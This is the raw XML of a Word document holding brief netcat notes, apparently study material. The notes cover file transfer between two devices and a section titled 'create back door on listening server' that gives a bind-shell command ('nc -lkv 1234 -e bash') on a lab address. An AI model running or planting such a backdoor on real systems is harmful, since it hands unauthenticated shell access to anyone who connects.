          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r w:rsidRPr="00321DE1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> command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F96A258" w14:textId="55360C9F" w:rsidR="00F56D5F" w:rsidRPr="00F56D5F" w:rsidRDefault="00F56D5F" w:rsidP="00F56D5F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bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56D5F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 xml:space="preserve">nc -lv 1234 </w:t>
      </w:r>
      <w:r w:rsidR="00E25F3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>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56D5F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 xml:space="preserve"> file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1947B29C" w14:textId="45F320E0" w:rsidR="00E25F3A" w:rsidRPr="00E25F3A" w:rsidRDefault="00321DE1" w:rsidP="00321DE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</w:pPr>
      <w:r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>2</w:t>
      </w:r>
      <w:r w:rsidR="00E25F3A" w:rsidRPr="00E25F3A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>. On device 2, connect to device 1 and redirect the file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9BCD5B" w14:textId="28022E16" w:rsidR="00E25F3A" w:rsidRPr="00E25F3A" w:rsidRDefault="00E25F3A" w:rsidP="00E25F3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bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E25F3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 xml:space="preserve">nc -v 10.0.2.4 1234 </w:t>
      </w:r>
      <w:r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>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E25F3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 xml:space="preserve"> file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D30B3D3" w14:textId="77777777" w:rsidR="009C469B" w:rsidRDefault="009C469B" w:rsidP="009C469B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C606255" w14:textId="5B0F18A1" w:rsidR="00F56D5F" w:rsidRDefault="009C469B" w:rsidP="009C469B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">create back door on listening server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFA4D75" w14:textId="5C0172C3" w:rsidR="00E21BCA" w:rsidRPr="00321DE1" w:rsidRDefault="00E21BCA" w:rsidP="00E21BC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</w:pPr>
      <w:r w:rsidRPr="00321DE1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 xml:space="preserve">Create a listening connection on device 1 and </w:t>
      </w:r>
      <w:r w:rsidR="0077422B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 xml:space="preserve">send bash of system to remote system </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667A5E0A" w14:textId="2CCC1CB9" w:rsidR="00E21BCA" w:rsidRPr="00F56D5F" w:rsidRDefault="00E21BCA" w:rsidP="00E21BC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bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56D5F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lastRenderedPageBreak/>
        <w:t>nc -l</w:t>
      </w:r>
      <w:r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>k</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56D5F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>v 1234</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> -e bash  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F56D5F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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F768BFB" w14:textId="7077D2E4" w:rsidR="00E21BCA" w:rsidRPr="00E21BCA" w:rsidRDefault="00E21BCA" w:rsidP="00E21BC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</w:pPr>
      <w:r w:rsidRPr="00E21BCA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>On device 2, connect to device 1 and redirect the file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E52109" w14:textId="0DE864EC" w:rsidR="00E21BCA" w:rsidRPr="00E25F3A" w:rsidRDefault="00E21BCA" w:rsidP="00E21BCA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bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E25F3A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bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -v 10.0.2.4 1234 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DCF0CF" w14:textId="77777777" w:rsidR="009C469B" w:rsidRPr="00E27EFF" w:rsidRDefault="009C469B" w:rsidP="009C469B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009C469B" w:rsidRPr="00E27EFF" w:rsidSect="00204D60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02A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B3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532E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="18DC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F001F7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20BC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A6752"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="42AE575C"/>
    <w:lvl w:ilvl="0" w:tplc="26088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354E4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="243C80A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A196D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E5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9A0C7A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F4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FE3094"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CFF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6E7477"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="70AA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62487C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26F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AF029E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A8029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552F17"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87DE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307684">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2134670918">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1248033249">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1652052070">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1409159543">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="431635008">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="734010238">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="455759643">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="702949823">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1575042866">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1818495704">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="641348214">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="49114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B"/>
    <w:rsid w:val="000329C4"/>
    <w:rsid w:val="000E52E4"/>
    <w:rsid w:val="000E63C1"/>
    <w:rsid w:val="001B758D"/>
    <w:rsid w:val="00204D60"/>
    <w:rsid w:val="0020554D"/>
    <w:rsid w:val="002147F5"/>
    <w:rsid w:val="00216605"/>
    <w:rsid w:val="002D0A30"/>
    <w:rsid w:val="002F2483"/>
    <w:rsid w:val="0032048A"/>
    <w:rsid w:val="00321DE1"/>
    <w:rsid w:val="00547432"/>
    <w:rsid w:val="006025C9"/>
    <w:rsid w:val="006339FB"/>
    <w:rsid w:val="0066632C"/>
    <w:rsid w:val="006F28D4"/>
    <w:rsid w:val="00756EC3"/>
    <w:rsid w:val="0077422B"/>
    <w:rsid w:val="00790F79"/>
    <w:rsid w:val="009C469B"/>
    <w:rsid w:val="009D5BC7"/>
    <w:rsid w:val="00A71DA9"/>
    <w:rsid w:val="00BA2E90"/>
    <w:rsid w:val="00BB5DF6"/>
    <w:rsid w:val="00C028EB"/>
    <w:rsid w:val="00C7671D"/>
    <w:rsid w:val="00D31769"/>
    <w:rsid w:val="00D6083E"/>
    <w:rsid w:val="00DB23E9"/>
    <w:rsid w:val="00E21BCA"/>
    <w:rsid w:val="00E25F3A"/>
    <w:rsid w:val="00E27EFF"/>
    <w:rsid w:val="00E46A7E"/>
    <w:rsid w:val="00E55BDD"/>
    <w:rsid w:val="00EB02FC"/>
    <w:rsid w:val="00F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53F7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FB0C3F2D-1AB6-4AF9-AA7F-B29EE32D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CA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00602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D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">
    <w:name w:val="listitem"/>
    <w:basedOn w:val="Normal"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5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56EC3"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Title1">
    <w:name w:val="Title1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32C"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="simpara">
    <w:name w:val="simpara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28EB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00204D60"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kw2">
    <w:name w:val="kw2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00204D60"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00F56D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1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21B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8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99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406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9036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7888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015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74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3384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665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593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439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698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9689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20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67472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1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87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35</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-27T07:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-22T14:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>